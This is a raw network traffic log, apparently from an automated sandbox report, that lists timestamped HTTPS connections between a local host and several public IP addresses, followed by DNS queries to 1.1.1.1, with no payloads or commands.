                                                                Aug 27, 2024 20:03:42.451333046 CEST49744443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:42.451344967 CEST44349744172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:42.454978943 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.454999924 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.455080032 CEST49746443192.168.2.16151.101.66.137
                                                                Aug 27, 2024 20:03:42.455089092 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.455137014 CEST49746443192.168.2.16151.101.66.137
                                                                Aug 27, 2024 20:03:42.456979990 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.457034111 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.457076073 CEST49746443192.168.2.16151.101.66.137
                                                                Aug 27, 2024 20:03:42.457082033 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.457110882 CEST49746443192.168.2.16151.101.66.137
                                                                Aug 27, 2024 20:03:42.458256006 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.458293915 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.458334923 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.458340883 CEST49746443192.168.2.16151.101.66.137
                                                                Aug 27, 2024 20:03:42.458394051 CEST49746443192.168.2.16151.101.66.137
                                                                Aug 27, 2024 20:03:42.458606005 CEST49746443192.168.2.16151.101.66.137
                                                                Aug 27, 2024 20:03:42.458611965 CEST44349746151.101.66.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.470412970 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:42.470432043 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:42.470514059 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:42.470736980 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:42.470747948 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:42.472668886 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:42.472701073 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.472765923 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:42.472991943 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:42.473009109 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:42.475538969 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:42.475570917 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:42.475647926 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:42.475974083 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:42.475986004 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:42.542670012 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:42.542715073 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:42.542804956 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:42.543018103 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:42.543030977 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.106527090 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.106653929 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.106903076 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.106920004 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.107023954 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.107044935 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.107085943 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:43.107292891 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:43.107321978 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:43.107660055 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:43.108081102 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.108084917 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:43.108160973 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.108160973 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:43.108396053 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.108418941 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.108474016 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.108535051 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:43.108697891 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.108709097 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.108773947 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.108781099 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.108830929 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.109123945 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.109137058 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.109211922 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.109232903 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.109441042 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.109517097 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.112162113 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.112364054 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.112389088 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.113389015 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.113451004 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.114345074 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.114430904 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.114516020 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.114531040 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.152501106 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.155163050 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.155165911 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.155170918 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.155180931 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.156500101 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:43.175448895 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:43.175523996 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:43.175585032 CEST49733443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:03:43.208767891 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.208825111 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.208868027 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.208877087 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.209208965 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.209233046 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.209258080 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.209261894 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.209299088 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.209395885 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.209676027 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.209719896 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.209723949 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.210458994 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.210515022 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.210520029 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.214183092 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.214253902 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.214260101 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.238013029 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.238169909 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.238238096 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.238815069 CEST49751443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.238851070 CEST4434975135.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.239056110 CEST49733443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:03:43.239063025 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:43.239569902 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.239599943 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.239677906 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.239893913 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.239905119 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.267184019 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.297849894 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.297862053 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.297903061 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.297921896 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.297934055 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.298048973 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.298048973 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.298065901 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.298118114 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.300175905 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.300193071 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.300265074 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.300270081 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.300311089 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.316965103 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.317004919 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.317091942 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.317115068 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.317127943 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.317147970 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.317183971 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.317553997 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.317687988 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.319473028 CEST49747443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:43.319489956 CEST44349747172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:43.384412050 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.384440899 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.384529114 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.384546041 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.384589911 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.386461020 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.386482000 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.386574984 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.386580944 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.386626005 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.387346029 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.387434006 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.387439013 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.387494087 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.387681007 CEST49749443192.168.2.16151.101.130.137
                                                                Aug 27, 2024 20:03:43.387696028 CEST44349749151.101.130.137192.168.2.16
                                                                Aug 27, 2024 20:03:43.632288933 CEST4968080192.168.2.16192.229.211.108
                                                                Aug 27, 2024 20:03:43.706712961 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.707210064 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.707237005 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.707583904 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.707905054 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.707974911 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.708058119 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.752501965 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.836582899 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.837075949 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.837136984 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.837338924 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:43.837342978 CEST4434975235.190.80.1192.168.2.16
                                                                Aug 27, 2024 20:03:43.837393045 CEST49752443192.168.2.1635.190.80.1
                                                                Aug 27, 2024 20:03:44.510313988 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510359049 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510385990 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510411024 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510426044 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.510446072 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510461092 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510467052 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.510490894 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.510868073 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510953903 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510977030 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.510993004 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.511009932 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.511042118 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.511068106 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.511079073 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.511125088 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.511132002 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.511142969 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.511183023 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.512265921 CEST49750443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:44.512288094 CEST44349750104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:44.560837030 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:44.560873032 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:44.560966015 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:44.579431057 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:44.579456091 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.044876099 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.045331955 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.045356989 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.045789957 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.046396971 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.046505928 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.046534061 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.089167118 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.089176893 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376595974 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376643896 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376672983 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376703978 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376724005 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.376734018 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376745939 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376770020 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.376795053 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.376806021 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376882076 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:45.376955032 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.377886057 CEST49753443192.168.2.16172.67.181.39
                                                                Aug 27, 2024 20:03:45.377901077 CEST44349753172.67.181.39192.168.2.16
                                                                Aug 27, 2024 20:03:57.861114025 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:57.861227036 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:57.861347914 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:58.061063051 CEST49748443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:58.061105013 CEST44349748172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:58.831943989 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:03:58.831969023 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:03:58.832066059 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:03:58.832469940 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:03:58.832488060 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:03:59.632080078 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:03:59.632190943 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:03:59.633780003 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:03:59.633795977 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:03:59.634040117 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:03:59.635441065 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:03:59.676506042 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.065789938 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.065815926 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.065830946 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.065937996 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:04:00.065963030 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.065977097 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:04:00.066018105 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:04:00.078641891 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.078691959 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.078747988 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.078756094 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:04:00.078811884 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:04:00.078893900 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:04:00.078906059 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:00.078916073 CEST49754443192.168.2.1640.68.123.157
                                                                Aug 27, 2024 20:04:00.078919888 CEST4434975440.68.123.157192.168.2.16
                                                                Aug 27, 2024 20:04:20.558238029 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:04:20.558249950 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:04:32.646555901 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:32.646603107 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:32.646742105 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:32.647041082 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:32.647056103 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:33.368005991 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:33.368387938 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:33.368416071 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:33.368750095 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:33.369060040 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:33.369132996 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:33.412262917 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:36.065314054 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:04:36.065465927 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:04:36.065562963 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:04:43.279181957 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:43.279258013 CEST44349756172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:04:43.279448986 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:44.061553955 CEST49756443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:04:44.061584949 CEST44349756172.217.16.196192.168.2.16
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Aug 27, 2024 20:03:27.906917095 CEST6046553192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:27.907135963 CEST5971453192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:27.980603933 CEST53619371.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:27.980644941 CEST53646251.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:28.353746891 CEST53604651.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:28.354655027 CEST53597141.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:28.991957903 CEST53605001.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:29.762990952 CEST6160453192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:29.763134003 CEST4925153192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:29.765166044 CEST6184853192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:29.765305996 CEST6196853192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:29.771692991 CEST53616041.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:29.771996021 CEST53492511.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:29.773372889 CEST53618481.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:30.176935911 CEST53619681.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:30.579299927 CEST5378653192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:30.579627037 CEST6197953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:30.586605072 CEST53537861.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:30.586618900 CEST53619791.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:32.252192020 CEST5588353192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:32.252829075 CEST6085453192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:32.260991096 CEST53558831.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:32.583076000 CEST5567953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:32.583235025 CEST5736253192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:32.591114998 CEST53556791.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:32.591131926 CEST53573621.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:32.660881996 CEST53608541.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:36.088407993 CEST4988653192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:36.088576078 CEST5490553192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:36.097657919 CEST53549051.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:36.100724936 CEST53498861.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:36.807626963 CEST6128953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:36.807802916 CEST5999953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:36.813282013 CEST5154653192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:36.813455105 CEST6135053192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:36.815469027 CEST53612891.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:36.815485001 CEST53599991.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:36.821399927 CEST53515461.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:36.821424007 CEST53613501.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:38.135056019 CEST6154953192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:38.135198116 CEST5433353192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:38.142369986 CEST53615491.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:38.142384052 CEST53543331.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:38.247483015 CEST5351353192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:38.247659922 CEST6074853192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:38.340138912 CEST53535131.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:38.375926971 CEST53607481.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:38.425673962 CEST6039553192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:38.425941944 CEST5292553192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:38.439069986 CEST53603951.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:38.439085960 CEST53529251.1.1.1192.168.2.16
                                                                Aug 27, 2024 20:03:41.595076084 CEST5056753192.168.2.161.1.1.1
                                                                Aug 27, 2024 20:03:41.595263958 CEST5190353192.168.2.161.1.1.1
